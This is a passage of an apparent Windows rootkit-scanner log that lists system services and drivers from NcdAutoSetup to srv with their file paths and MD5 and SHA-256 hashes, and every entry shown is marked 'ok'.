20:02:58.0244 0x0b14  [ 9ACED0F5B458C9011F39143326494E93, 9DFFC7EE7DE6FD92545EC6A203213C498A01EEFB0BC55460D339BCE498E56A7F ] NcdAutoSetup    C:\WINDOWS\System32\NcdAutoSetup.dll
20:02:58.0244 0x0b14  NcdAutoSetup - ok
20:02:58.0354 0x0b14  [ 6D3A2565E01B3E4B0F1BEDB0D4B00B3F, 95F2608E17CA3E25BD7958D1A49F7030EC8088BC1DF12422F1DAC5BA99113E34 ] NDIS            C:\WINDOWS\system32\drivers\ndis.sys
20:02:58.0416 0x0b14  NDIS - ok
20:02:58.0447 0x0b14  [ 8CECC8DA55F3274181FD1EA28AD76664, 188112424CEF97FB926A0FB915260B803555A775DD2E1846725A9C8616300F42 ] NdisCap         C:\WINDOWS\system32\DRIVERS\ndiscap.sys
20:02:58.0463 0x0b14  NdisCap - ok
20:02:58.0479 0x0b14  [ 269882812E9A68FFF1AFE1283D428322, 50B99EBC42DA9B46A8C2C28C9BADCF58AE3079535CDD1227D0F5C86291C715FF ] NdisImPlatform  C:\WINDOWS\system32\DRIVERS\NdisImPlatform.sys
20:02:58.0510 0x0b14  NdisImPlatform - ok
20:02:58.0541 0x0b14  [ 82821F4EEC776B4CF11695A38F3ABA46, 23184F9D31E662855DC4D23EFE7C2FE00E5487D3762B6024704A5D8C87762E1C ] NdisTapi        C:\WINDOWS\system32\DRIVERS\ndistapi.sys
20:02:58.0557 0x0b14  NdisTapi - ok
20:02:58.0588 0x0b14  [ B832B35055BA2B7B4181861FF94D8E59, 2E60E5D503E88D27E35ECFEE265D51328E93A9C7B9B931F86D9CBC947636BB00 ] Ndisuio         C:\WINDOWS\system32\DRIVERS\ndisuio.sys
20:02:58.0604 0x0b14  Ndisuio - ok
20:02:58.0619 0x0b14  [ 1F58E48EF75F34C35D8E93A0DC535CFE, D65619A6C4B1747F8B05DA08A44EF0E46B5CC384880E04E4755A2BA6CDB3C4EA ] NdisVirtualBus  C:\WINDOWS\System32\drivers\NdisVirtualBus.sys
20:02:58.0635 0x0b14  NdisVirtualBus - ok
20:02:58.0666 0x0b14  [ DEC29080202D4F9F17F55E18BCFCC41A, F7E543741B1F4F637A99C40543D6AEC6EBF893F74359BBA769D1F882E0AFB571 ] NdisWan         C:\WINDOWS\system32\DRIVERS\ndiswan.sys
20:02:58.0713 0x0b14  NdisWan - ok
20:02:58.0744 0x0b14  [ DEC29080202D4F9F17F55E18BCFCC41A, F7E543741B1F4F637A99C40543D6AEC6EBF893F74359BBA769D1F882E0AFB571 ] NdisWanLegacy   C:\WINDOWS\system32\DRIVERS\ndiswan.sys
20:02:58.0760 0x0b14  NdisWanLegacy - ok
20:02:58.0791 0x0b14  [ DDD7F92A83F74D1476B71FBA9530A8DC, D3F94FC9F48854E09B0B77CE5E1C1DB948D54EAC63C5583437051BB893B5A386 ] NDProxy         C:\WINDOWS\system32\drivers\NDProxy.sys
20:02:58.0807 0x0b14  NDProxy - ok
20:02:58.0869 0x0b14  [ 3083926D1CC5B56EA0786527B557DD1B, 3C3F0CA0D43398576DBE8F677B353ADDA7E8F56829874958CE668E31261C1590 ] Ndu             C:\WINDOWS\system32\drivers\Ndu.sys
20:02:58.0885 0x0b14  Ndu - ok
20:02:58.0947 0x0b14  [ 42FF4975D032CAE558AE4BB8448F6E5A, 0B8FACF3382443DED79A8004A6AA14C32471A6A1C6BAA543AA9F3FEC52620A6D ] NetBIOS         C:\WINDOWS\system32\DRIVERS\netbios.sys
20:02:58.0947 0x0b14  NetBIOS - ok
20:02:58.0979 0x0b14  [ 0217532E19A748F0E5D569307363D5FD, C40C2E7AFA276057E7327A7BB173122689D6CEC9AE443C3850C3F94AF03DFBF5 ] NetBT           C:\WINDOWS\system32\DRIVERS\netbt.sys
20:02:59.0010 0x0b14  NetBT - ok
20:02:59.0041 0x0b14  [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] Netlogon        C:\WINDOWS\system32\lsass.exe
20:02:59.0041 0x0b14  Netlogon - ok
20:02:59.0104 0x0b14  [ 8F074B62E66B6117D9598C62A12069C5, 5FDB19045D3E2F6D0F0C5158AC2ECB0D5404CD2AF7A319755D7E3753CA3B7CF3 ] Netman          C:\WINDOWS\System32\netman.dll
20:02:59.0150 0x0b14  Netman - ok
20:02:59.0229 0x0b14  [ 4A04B1CD5BFB4A978C5F60E86D6C3E45, A946922C1C38ADD3CF9D3B09DDCC301AE4DAC960A081B2F42B32BE1E7095B3FD ] netprofm        C:\WINDOWS\System32\netprofmsvc.dll
20:02:59.0260 0x0b14  netprofm - ok
20:02:59.0307 0x0b14  [ 1092B3190E69E0C5ECBCE90F171DE047, C16106EEFC324EE80E5F659CB71A5DD69FA800D36D829F5B0E6AD3393BD1BAF7 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
20:02:59.0354 0x0b14  NetTcpPortSharing - ok
20:02:59.0400 0x0b14  [ D4DCE03870314D3354F3501F9DDD4123, 5BFE8299B3F72B8C39A4965365CBF5BA151024451F02DD872FAD1CC35CF94CEA ] netvsc          C:\WINDOWS\System32\drivers\netvsc63.sys
20:02:59.0432 0x0b14  netvsc - ok
20:02:59.0494 0x0b14  [ E94EB2A95D7D016E119C4D6868788831, 3E4A925D23262FBA0A6432DD635FBE94B0CEF76BD9BB323254B66977497FEE2A ] NlaSvc          C:\WINDOWS\System32\nlasvc.dll
20:02:59.0525 0x0b14  NlaSvc - ok
20:02:59.0557 0x0b14  [ 8F44A2F57C9F1A19AC9C6288C10FB351, 310274DDBAC0FE4BE54ECD3B90C97D82A0F9F5CFCA7A35711A36164DE4B94074 ] Npfs            C:\WINDOWS\system32\drivers\Npfs.sys
20:02:59.0557 0x0b14  Npfs - ok
20:02:59.0572 0x0b14  [ CBDB4F0871C88DF930FC0E8588CA67FC, 7E4AA3EA81A9D532F236FD7896744F07ED07CA9B37A9F18A9778BCCCC67490F2 ] npsvctrig       C:\WINDOWS\System32\drivers\npsvctrig.sys
20:02:59.0588 0x0b14  npsvctrig - ok
20:02:59.0634 0x0b14  [ 0F12A72A753CFD7FB0631EE8D08FE983, 860A96471F6CD90DDA9AB3A48E95CEAD826C87D2FA98A00EF91B61C44A4C8B82 ] nsi             C:\WINDOWS\system32\nsisvc.dll
20:02:59.0650 0x0b14  nsi - ok
20:02:59.0665 0x0b14  [ 0E046FF5823B95326D10CF1B4AF23541, 39D22715003746527AB4BFEDED8C34B695DAF589091AE7F3A2A2C4B8A35675A9 ] nsiproxy        C:\WINDOWS\system32\drivers\nsiproxy.sys
20:02:59.0681 0x0b14  nsiproxy - ok
20:02:59.0837 0x0b14  [ 7F68063A5A0461E02BC860CE0E6BFDDC, 47E9F75D27B97278B74034B7D3951A26B1644911ED321455E08D935731C858DE ] Ntfs            C:\WINDOWS\system32\drivers\Ntfs.sys
20:02:59.0978 0x0b14  Ntfs - ok
20:02:59.0994 0x0b14  [ EF1B290FC9F0E47CC0B537292BEE5904, DBC07BBC54EBC2D2E576B23A4CE116B3DA988577AD0D96CB7289A6748A60F9EA ] Null            C:\WINDOWS\system32\drivers\Null.sys
20:02:59.0994 0x0b14  Null - ok
20:03:00.0056 0x0b14  [ BC6B5942AFF25EBAF62DE43C3807EDF8, CB0FA194084B8C309039D571B5760FDA800E9531B8660C499B4F9977BA5C36D5 ] nvraid          C:\WINDOWS\system32\drivers\nvraid.sys
20:03:00.0087 0x0b14  nvraid - ok
20:03:00.0119 0x0b14  [ 1F43ABFFAC3D6CA356851D517392966E, 6FD7621F67BA94B0E1D8F43BEC2951DBCDEEA1E848BB265AC169E27C01DA68F2 ] nvstor          C:\WINDOWS\system32\drivers\nvstor.sys
20:03:00.0150 0x0b14  nvstor - ok
20:03:00.0181 0x0b14  [ 6934A936A7369DFE37B7DBA93F5E5E49, 0900FEEB0CE8D09F0FC60630B5B986034A8BCD3882ED66E47170810C32492892 ] nv_agp          C:\WINDOWS\system32\drivers\nv_agp.sys
20:03:00.0212 0x0b14  nv_agp - ok
20:03:00.0290 0x0b14  [ 26657F3B4F39A0E64AF859278B599C4E, 3DD65E0BCEF3045DBA29FB8171CA3FCC9781AED3A1C7A160CF26388CE80A3683 ] p2pimsvc        C:\WINDOWS\system32\pnrpsvc.dll
20:03:00.0306 0x0b14  p2pimsvc - ok
20:03:00.0353 0x0b14  [ FD8F61F0D1F64BBB3D835F39A3F979C9, E5C5F86576488EA7F605E26C06EE5AFB36506A446F60C894D55E0A148BF7F02D ] p2psvc          C:\WINDOWS\system32\p2psvc.dll
20:03:00.0384 0x0b14  p2psvc - ok
20:03:00.0431 0x0b14  [ 764B1121867B2D9B31C491668AC72B2B, 32C04B6FCE1DDD09697B81473A23BDCED8BEEFBCD0D2D58DDC9A11A33C756967 ] Parport         C:\WINDOWS\System32\drivers\parport.sys
20:03:00.0462 0x0b14  Parport - ok
20:03:00.0509 0x0b14  [ BAFF6122CFC9F95CA175AD8C348179A4, 079A912D951DF6A57BC1BDB0D182977EE9592751EC9DDCDA2932BDEDB333850C ] partmgr         C:\WINDOWS\system32\drivers\partmgr.sys
20:03:00.0509 0x0b14  partmgr - ok
20:03:00.0603 0x0b14  [ ABE95ABE27A8BD9701782BBCD82C9925, AE3BA1E9ECDE692374D8DAC95A8DAA289DD2470E3D8D58EFAD9F83A37F3AC8E5 ] PcaSvc          C:\WINDOWS\System32\pcasvc.dll
20:03:00.0634 0x0b14  PcaSvc - ok
20:03:00.0712 0x0b14  [ 91ED124E261EA8FAA1C0FFDF2A71B0C4, 20E41A38067395D03184938983A9BE459717A1941352972DBC28D83D542319EC ] pci             C:\WINDOWS\system32\drivers\pci.sys
20:03:00.0728 0x0b14  pci - ok
20:03:00.0759 0x0b14  [ 346E38FCC6859A727DD28AFAD1F0AFF4, FF3DA26F79B3BC3A5B8A8AA0B9139B9EF70297F4EA1203B1E68FB5A212C3AA58 ] pciide          C:\WINDOWS\system32\drivers\pciide.sys
20:03:00.0775 0x0b14  pciide - ok
20:03:00.0837 0x0b14  [ 4D3BDCC1C7B40C9D7B6AD990E6DEC397, 27A7AF2127B699F4579CB77936F38DC102211E26E5E2947DB808756FE06FC98E ] pcmcia          C:\WINDOWS\system32\drivers\pcmcia.sys
20:03:00.0869 0x0b14  pcmcia - ok
20:03:00.0884 0x0b14  [ BF28771D1436C88BE1D297D3098B0F7D, 5F7630916A76A8CF31289E9C577F522B999C74C39E541CD40E62BD53004BEF74 ] pcw             C:\WINDOWS\system32\drivers\pcw.sys
20:03:00.0884 0x0b14  pcw - ok
20:03:00.0900 0x0b14  [ 24A8DFC07E4BAF29AEA26E383D4CC886, 1B903FE52CD816662D37A8113930B4B7019B6996D49F1982D8F42933A3525A67 ] pdc             C:\WINDOWS\system32\drivers\pdc.sys
20:03:00.0915 0x0b14  pdc - ok
20:03:00.0993 0x0b14  [ 0ECEE590F2E2EF969FB74A6FC583A1E6, 1C611D9225C863CF32125F684B324C58BDE1942F4F283F5674133200AC505D44 ] PEAUTH          C:\WINDOWS\system32\drivers\peauth.sys
20:03:01.0072 0x0b14  PEAUTH - ok
20:03:01.0197 0x0b14  [ 8E3C640FFF5A963F570233AE99C0FFF3, 3DE978B005BF2E88BA858CE37D9E27BD3584642B8412E22C300A1E739743838A ] PerfHost        C:\WINDOWS\SysWow64\perfhost.exe
20:03:01.0212 0x0b14  PerfHost - ok
20:03:01.0368 0x0b14  [ 70B39E7241F750A248798CE82C44596D, 54A72199EB277EE586611DCBC21654786FD2196F91D5884C4F531297893CC3EC ] pla             C:\WINDOWS\system32\pla.dll
20:03:01.0462 0x0b14  pla - ok
20:03:01.0525 0x0b14  [ 2C02AFF8383D893F8DBEB07A84F6E77C, 7CC34BAC67E2988E3D16DD6EB6F6785CD2460E3EF7FBD0BD5F86E49793BD473E ] PlugPlay        C:\WINDOWS\system32\umpnpmgr.dll
20:03:01.0540 0x0b14  PlugPlay - ok
20:03:01.0572 0x0b14  [ 4570F8A37D221660F3A09D6F4DD4BA94, 0EA190CFFA53DF9CCA2D53A4EF1BCB837BA3F2489A3AC5BD11F6D6ED811D118E ] PNRPAutoReg     C:\WINDOWS\system32\pnrpauto.dll
20:03:01.0603 0x0b14  PNRPAutoReg - ok
20:03:01.0644 0x0b14  [ 26657F3B4F39A0E64AF859278B599C4E, 3DD65E0BCEF3045DBA29FB8171CA3FCC9781AED3A1C7A160CF26388CE80A3683 ] PNRPsvc         C:\WINDOWS\system32\pnrpsvc.dll
20:03:01.0675 0x0b14  PNRPsvc - ok
20:03:01.0738 0x0b14  [ BDD52AB4AEBB8B1904568DBD0CCB70CB, C3D1DBA349C79B43DCDD9EF5255C5EE973EFB844235B808B5EF9B63A51FF00AA ] PolicyAgent     C:\WINDOWS\System32\ipsecsvc.dll
20:03:01.0769 0x0b14  PolicyAgent - ok
20:03:01.0800 0x0b14  [ C8DD82C3035E60D671B8CC5DF128D3A9, 6AABF632CBEDA9A7B553BC9134FF100CB6FDC88000D499D2883408FCEDD97576 ] Power           C:\WINDOWS\system32\umpo.dll
20:03:01.0816 0x0b14  Power - ok
20:03:02.0613 0x0b14  [ E3514CE7CB4AF80ECCA383F065BC77C0, 1EA06D358A07EB9DFB703CEFC4EB834B947B899E0ACFE1C494E2DAED63F1D4B5 ] PrintNotify     C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll
20:03:03.0238 0x0b14  PrintNotify - ok
20:03:03.0316 0x0b14  [ ECD373F9571C745894367CC2635EA44F, E08B2A1017DAE1BF10B986DAFAD14BDE20D79703E0EF3A8C700A3753908C1392 ] Processor       C:\WINDOWS\System32\drivers\processr.sys
20:03:03.0347 0x0b14  Processor - ok
20:03:03.0409 0x0b14  [ C8D39A07CAD9EF1C86BD5D7CAC98DA54, 10146D1E023D9BC5B8CBAADE6A70D87A41BDABAA44D812B609C13563DF25527A ] ProfSvc         C:\WINDOWS\system32\profsvc.dll
20:03:03.0425 0x0b14  ProfSvc - ok
20:03:03.0456 0x0b14  [ FC0141B4A5AD6D637D883C1A89FC45C5, DCE8942C02EEDAE7A57707CA60CAC3A8CD6BA68E6571E405CA882D4DD6D69E43 ] Psched          C:\WINDOWS\system32\DRIVERS\pacer.sys
20:03:03.0472 0x0b14  Psched - ok
20:03:03.0534 0x0b14  [ DAA9DEE0A5D5F238C4EE54C2C7FB67C5, 7EC8C603BD92699AC35BDCD294F13BEE90D5C2C195FD93A3F16928BFCF53CA93 ] QWAVE           C:\WINDOWS\system32\qwave.dll
20:03:03.0581 0x0b14  QWAVE - ok
20:03:03.0613 0x0b14  [ 83868EB2924E6BC21A54337C65D614D1, 8D1BE01EBD190231153B867C32120DC8FBFBD32050448A778134D435D76A0B07 ] QWAVEdrv        C:\WINDOWS\system32\drivers\qwavedrv.sys
20:03:03.0631 0x0b14  QWAVEdrv - ok
20:03:03.0659 0x0b14  [ B337B1F1E82A83E20A1743E008E25C0F, A2E8AF041B4CAB78AEE28A2147A189FF0F9D2FCEFB167D60FBBA0A787A5A5BE7 ] RasAcd          C:\WINDOWS\system32\DRIVERS\rasacd.sys
20:03:03.0659 0x0b14  RasAcd - ok
20:03:03.0721 0x0b14  [ 044638489B4A5FE5334F46C5314A0826, E06CC2A9EF369794DAD69FBB5AFD1676D4283DDAB2AD5E3EFE454C473F62F955 ] RasAuto         C:\WINDOWS\System32\rasauto.dll
20:03:03.0737 0x0b14  RasAuto - ok
20:03:03.0799 0x0b14  [ F83B38FCD4F69157B3D158433FA149CC, AB103BD3E2B3B134CB355C556DF70BCF0CF4DB11EFF7DB4A9876D5AA43D81293 ] RasMan          C:\WINDOWS\System32\rasmans.dll
20:03:03.0862 0x0b14  RasMan - ok
20:03:03.0909 0x0b14  [ 5247F308C4103CDC4FE12AE1D235800A, E567CD33CA1897D53795E071B7AFBAF98B2C8F725F8BED0BA90F5EF611520E48 ] RasPppoe        C:\WINDOWS\system32\DRIVERS\raspppoe.sys
20:03:03.0924 0x0b14  RasPppoe - ok
20:03:04.0003 0x0b14  [ A1A5E79C0D1352AFDC08328A623DA051, 01546DDE6F1FF159A7EB7F2BF104910445D3D863F1F37DEA695579BA60D84280 ] rdbss           C:\WINDOWS\system32\DRIVERS\rdbss.sys
20:03:04.0018 0x0b14  rdbss - ok
20:03:04.0049 0x0b14  [ 6B21EBF892CD8CACB71669B35AB5DE32, 0AD8E14FEF16FB2559F5FC8AFBC9D49E4E24F43CF65F480DBF9FAB593269B419 ] rdpbus          C:\WINDOWS\System32\drivers\rdpbus.sys
20:03:04.0065 0x0b14  rdpbus - ok
20:03:04.0128 0x0b14  [ 680C1DAE268B6FB67FA21B389A8B79EF, 856911F77BDD8830C3D683EBE8AF399FB3A54C7D8D0B34EA37D903377F0A39BD ] RDPDR           C:\WINDOWS\system32\drivers\rdpdr.sys
20:03:04.0159 0x0b14  RDPDR - ok
20:03:04.0206 0x0b14  [ BC8A79C625568DDB7DCA49D0C2741A64, AB0A7ED9EC2282EC0356D27EA4F70515943E41C2112428B787636B8BEC278933 ] RdpVideoMiniport C:\WINDOWS\system32\drivers\rdpvideominiport.sys
20:03:04.0206 0x0b14  RdpVideoMiniport - ok
20:03:04.0253 0x0b14  [ A26AEC49F318FEE141DDDB2C5F99B3E6, 246AD79FF27E79DEDCB0AAA7C22A8EA6349DEDAC863413A1E378E68FD94C9C4F ] rdyboost        C:\WINDOWS\system32\drivers\rdyboost.sys
20:03:04.0268 0x0b14  rdyboost - ok
20:03:04.0346 0x0b14  [ 615DFD97DEA56CE1C3A52185A3038FF8, 707BF5F9FAE478A12656D15013F507CC1335E7B72BD21CA99BB813CB95E37BC0 ] ReFS            C:\WINDOWS\system32\drivers\ReFS.sys
20:03:04.0440 0x0b14  ReFS - ok
20:03:04.0487 0x0b14  [ 0CF7CB56BF2D5E9DBCEE0185CB626FAD, 2BD2E2FB1D2EADD1F70EF55E8523C353F95D4FEB1BAD5017FA4D94F790F27825 ] RemoteAccess    C:\WINDOWS\System32\mprdim.dll
20:03:04.0518 0x0b14  RemoteAccess - ok
20:03:04.0581 0x0b14  [ AC8785B53F8436058C90450DA1840AE7, CC1FFC2713910211F8A6AD532DBB9253ACD188CBD784F1BE6613DF382825A3C1 ] RemoteRegistry  C:\WINDOWS\system32\regsvc.dll
20:03:04.0612 0x0b14  RemoteRegistry - ok
20:03:04.0659 0x0b14  [ 65B9FDE300A6DECC03BA44C4616DCAD6, CAD992982733DD20282A3453DC4E554AE1FC077C35479C0CA4E8BC3A9DCD3BB0 ] RpcEptMapper    C:\WINDOWS\System32\RpcEpMap.dll
20:03:04.0674 0x0b14  RpcEptMapper - ok
20:03:04.0706 0x0b14  [ A737B433ABAF3F2DCB2BD7B4CC582B26, 3B5706B0CF0969A9F82060FD4DCC745F2D83C066B663FE8A4F0F493B64032C9C ] RpcLocator      C:\WINDOWS\system32\locator.exe
20:03:04.0721 0x0b14  RpcLocator - ok
20:03:04.0799 0x0b14  [ A6F17C299A03BAFEFB9257C462A19E00, EB68967D28355271897166D7B6FD963D1E546D3C24AE1AEAAC561F94357A9345 ] RpcSs           C:\WINDOWS\system32\rpcss.dll
20:03:04.0846 0x0b14  RpcSs - ok
20:03:04.0924 0x0b14  [ A1D5FFEFDBEB3881EC3D74CC7136847F, B3D278267EF17CC6F2FAF92D3FE67734FB9689EDDFA2A78F620300409DA5D0BB ] RSP2STOR        C:\WINDOWS\system32\DRIVERS\RtsP2Stor.sys
20:03:04.0956 0x0b14  RSP2STOR - ok
20:03:05.0003 0x0b14  [ 2D05A5508F4685412F2B89E8C2189ABC, 82F12B4E0E73411A121EFD35FBD3B44CBBC0AE96ACFBB45D8C3C3777E2EA320D ] rspndr          C:\WINDOWS\system32\DRIVERS\rspndr.sys
20:03:05.0018 0x0b14  rspndr - ok
20:03:05.0081 0x0b14  [ 19764658C1468C2C0CEF133D28414A6B, 87AD4056F6C67052433A366B200B75613148B69B9B9D502AD926A7F7F037B8DE ] RTL8168         C:\WINDOWS\system32\DRIVERS\Rt630x64.sys
20:03:05.0143 0x0b14  RTL8168 - ok
20:03:05.0190 0x0b14  [ 1A063730F221B2746FF00457AE17E4F0, 39A3C258CBFE3BC566C63528C9020A3BC9409736AE5289C08A7BA471D8409263 ] s3cap           C:\WINDOWS\System32\drivers\vms3cap.sys
20:03:05.0190 0x0b14  s3cap - ok
20:03:05.0237 0x0b14  [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] SamSs           C:\WINDOWS\system32\lsass.exe
20:03:05.0237 0x0b14  SamSs - ok
20:03:05.0315 0x0b14  [ C624A1B32211C3166EDB3F4AB02A30B7, 6B2A4607DB52D74242787ED9DF9067058983D310431D8612D2B0236E6201E681 ] sbp2port        C:\WINDOWS\system32\drivers\sbp2port.sys
20:03:05.0346 0x0b14  sbp2port - ok
20:03:05.0440 0x0b14  [ 74A3B67F03877D06B09B1B40C5ED582E, A8FF9BF416F0BF365BFB4E1796859825C811A74B5E54DDDCE8345193BEEBE206 ] SCardSvr        C:\WINDOWS\System32\SCardSvr.dll
20:03:05.0471 0x0b14  SCardSvr - ok
20:03:05.0487 0x0b14  [ 8B9C4D55B4A536FB01C360DDB9533574, 9B939FE68F6F9C171ED0D91E2CE1E67515295D34EC23606BCDFD097DCC8CFD4A ] ScDeviceEnum    C:\WINDOWS\System32\ScDeviceEnum.dll
20:03:05.0518 0x0b14  ScDeviceEnum - ok
20:03:05.0565 0x0b14  [ 13BEA6C882D4D877A5A85CA149C86BC1, 8E9BE5C2A36D5881D9985C3A31309FE03966EA13A3541D3C5B542AB67FA0D55F ] scfilter        C:\WINDOWS\system32\DRIVERS\scfilter.sys
20:03:05.0581 0x0b14  scfilter - ok
20:03:05.0713 0x0b14  [ A626F5E446860F22835E783142D7AE33, 3A786639E1FABCA512F4F91A10811DD3C4D9C9C9BB893362E4D019219D0BD8E2 ] Schedule        C:\WINDOWS\system32\schedsvc.dll
20:03:05.0791 0x0b14  Schedule - ok
20:03:05.0838 0x0b14  [ 41C0D7B1A6D4AD119BA6AC0487EA5C8E, 516C2B34BA7507D0DA4148B4ABC0A8C36286570D4EA5C60B28647B1249C15018 ] SCPolicySvc     C:\WINDOWS\System32\certprop.dll
20:03:05.0853 0x0b14  SCPolicySvc - ok
20:03:05.0947 0x0b14  [ C54B6B2170BF628FD42F799A66956D75, BCF460A124CAA6F1F1A9A7BCBDCC2D5E39B0404D96B7C9FFAC806E041782B91E ] sdbus           C:\WINDOWS\System32\drivers\sdbus.sys
20:03:05.0978 0x0b14  sdbus - ok
20:03:06.0025 0x0b14  [ 0B1E929D11A8E358106955603FAC65E8, A5EC91BFC0873EC6AB1D0DB4E91654BD35339BD680E7E82DA2DC64996B4AE515 ] sdstor          C:\WINDOWS\System32\drivers\sdstor.sys
20:03:06.0041 0x0b14  sdstor - ok
20:03:06.0088 0x0b14  [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] secdrv          C:\WINDOWS\system32\drivers\secdrv.sys
20:03:06.0103 0x0b14  secdrv - ok
20:03:06.0135 0x0b14  [ BA24CEA7152239F42ECD04AFB7C89D24, A2A11EABB0C283772B74667C7544B61BEB1B9745FBF065E831542129EB585AFA ] seclogon        C:\WINDOWS\system32\seclogon.dll
20:03:06.0150 0x0b14  seclogon - ok
20:03:06.0181 0x0b14  [ 81FE9A81EDF8016816C9E91FBFBF7D35, 87FB92A3D15F312F0B9C423EF851061A944B013E5668D8C9A441B4DC0EB690AF ] SENS            C:\WINDOWS\System32\sens.dll
20:03:06.0181 0x0b14  SENS - ok
20:03:06.0244 0x0b14  [ 6E4012AE67F09F867EF620C8D5524C0B, 63933E51F8E413E63481369CE2F9FD224560550FBD3BD2B4573E9F4AD88708A2 ] SensrSvc        C:\WINDOWS\system32\sensrsvc.dll
20:03:06.0260 0x0b14  SensrSvc - ok
20:03:06.0291 0x0b14  [ DB2FF24CE0BDD15FE75870AFE312BA89, 7DB0D978C92CD0A0A81F7AB46FE323B4929CEA01585B0F330921E6DFA7DE1B85 ] SerCx           C:\WINDOWS\system32\drivers\SerCx.sys
20:03:06.0322 0x0b14  SerCx - ok
20:03:06.0338 0x0b14  [ 0044B31F93946D5D41982314381FE431, 95B8A94BA9EF770F29ACD5B23D447EC2B6CF1CB3D0030343BA1550AC31F6E2A5 ] SerCx2          C:\WINDOWS\system32\drivers\SerCx2.sys
20:03:06.0369 0x0b14  SerCx2 - ok
20:03:06.0416 0x0b14  [ 3CD600C089C1251BEEB4CD4CD5164F9E, D9F81951B4454B24E821E33ACA53A851A61F3135E8EC6FBE6761A1A3E1CDCBE2 ] Serenum         C:\WINDOWS\System32\drivers\serenum.sys
20:03:06.0431 0x0b14  Serenum - ok
20:03:06.0494 0x0b14  [ D864381BC9C725FAB01D94C060660166, 132FED95222BBE3B0B25B3F1F0EFC5903D04564BD047BA4D2042AD51E3FDA724 ] Serial          C:\WINDOWS\System32\drivers\serial.sys
20:03:06.0510 0x0b14  Serial - ok
20:03:06.0556 0x0b14  [ 148195AE95D9BC7375A08846439FDAC1, 3A2F78FD18AA7A6D659921E19335E943894530874AC5AB5E7219CEF28FA54F7A ] sermouse        C:\WINDOWS\System32\drivers\sermouse.sys
20:03:06.0556 0x0b14  sermouse - ok
20:03:06.0635 0x0b14  [ 3A2F1A7472C3B7CC9B89C8516C726488, 9BCBBAC10C900EA7B30822B463A77EE5067F217C4B490857A09E5277983CB89B ] SessionEnv      C:\WINDOWS\system32\sessenv.dll
20:03:06.0681 0x0b14  SessionEnv - ok
20:03:06.0728 0x0b14  [ 472B7A5AC181C050888DB454663DD764, C950A8615D57BFD455E18880398350642B2E1D6B951EC9754FD8D429F3418835 ] sfloppy         C:\WINDOWS\System32\drivers\sfloppy.sys
20:03:06.0744 0x0b14  sfloppy - ok
20:03:06.0806 0x0b14  [ 8081FF3DAE8159FE8956B09BC29CE983, AC0F305AEE8B1AB2E1275F1D33EC1D2F3E23F234F831BD9D41F415A94A19D3AB ] SharedAccess    C:\WINDOWS\System32\ipnathlp.dll
20:03:06.0853 0x0b14  SharedAccess - ok
20:03:06.0947 0x0b14  [ 7FD9A61A3523A61FC135D61D6E160314, 409E1CF7A62FD90CBC31AEAFBB7230B02DBEC6CFCA2D266D221A7643FAEBA13B ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
20:03:06.0994 0x0b14  ShellHWDetection - ok
20:03:07.0041 0x0b14  [ 2F518D13DD6F3053837FE606F1A2EA1F, 64109296CE95BD233525688A350D575CF97B9464659AA07CF78B307B6ADBC835 ] SiSRaid2        C:\WINDOWS\system32\drivers\SiSRaid2.sys
20:03:07.0072 0x0b14  SiSRaid2 - ok
20:03:07.0103 0x0b14  [ 1AC9A200A9C49C4508F04AAFFCA34A3F, 972BCB2A39169155F74111FAC74ACCD8F50E34EADCF087833B0980827627BBF4 ] SiSRaid4        C:\WINDOWS\system32\drivers\sisraid4.sys
20:03:07.0119 0x0b14  SiSRaid4 - ok
20:03:07.0181 0x0b14  [ AF5CC3F9B88F140D78FC967ABF0F4EC7, 7CE3AB7B0A36635CF00E35E84C14B8661FAF794ABCFA61AE45A0E5E8EA996A3B ] SmbDrv          C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys
20:03:07.0197 0x0b14  SmbDrv - ok
20:03:07.0213 0x0b14  [ 19555D03CB179BED8B8AAA239A36BDA4, 7B975821D52ABE077496B3CFC010B33D478CD2C36E6A74D8F72D2BF582B8C84A ] SmbDrvI         C:\WINDOWS\System32\drivers\Smb_driver_Intel.sys
20:03:07.0228 0x0b14  SmbDrvI - ok
20:03:07.0275 0x0b14  [ 3C84DCCE5B322F745A75CA8BA3A0F6B3, 1FB94A8A1C63D6FDB82E28ED5B696B3CB1F64183A89A3B5153B266C292CB7815 ] smphost         C:\WINDOWS\System32\smphost.dll
20:03:07.0291 0x0b14  smphost - ok
20:03:07.0353 0x0b14  [ D0EB0DF8C603BBA084351A92732B1CBE, E24ED8F78EF41C1BC17386AE4BBCE0DC892C5B89B12C03FC9FB61D359B13F1B4 ] SNMPTRAP        C:\WINDOWS\System32\snmptrap.exe
20:03:07.0369 0x0b14  SNMPTRAP - ok
20:03:07.0478 0x0b14  [ D24B1945ED1F9C96DA786DBBF1E983CE, B46CB0B72B7A3DF94A46B8D65E38535C5F8E72A55CF2DC48EFA1F9A0108691C4 ] spaceport       C:\WINDOWS\system32\drivers\spaceport.sys
20:03:07.0588 0x0b14  spaceport - ok
20:03:07.0652 0x0b14  [ F337BE11071818FC3F5DC2940B6BDE34, D5CFF00E5DF37045F71AEE101AC9B270EBB29F372F404757B58600E9966C7E4D ] SpbCx           C:\WINDOWS\system32\drivers\SpbCx.sys
20:03:07.0668 0x0b14  SpbCx - ok
20:03:07.0762 0x0b14  [ FCB156A6745631A67DEA61827061D483, 9275ABFA1E1E595969A71C0DA228D18D1B868BF46E097E1276142BD80F8A32C9 ] Spooler         C:\WINDOWS\System32\spoolsv.exe
20:03:07.0809 0x0b14  Spooler - ok
20:03:08.0246 0x0b14  [ C993A0B97BECD3AAF5158E3869878465, 8B86F37DEFCBE55DE507D830EC4980EBB39B3CCA30C2B3E76B588AAB282A50FC ] sppsvc          C:\WINDOWS\system32\sppsvc.exe
20:03:08.0652 0x0b14  sppsvc - ok
20:03:08.0762 0x0b14  [ 6416E79A58A8FCC33A447A4DDDD3BF04, 839E3107ACCD520C309BD6C8324DF7A8EB724EAD442AB1F1CACB0D83F84BE488 ] srv             C:\WINDOWS\system32\DRIVERS\srv.sys
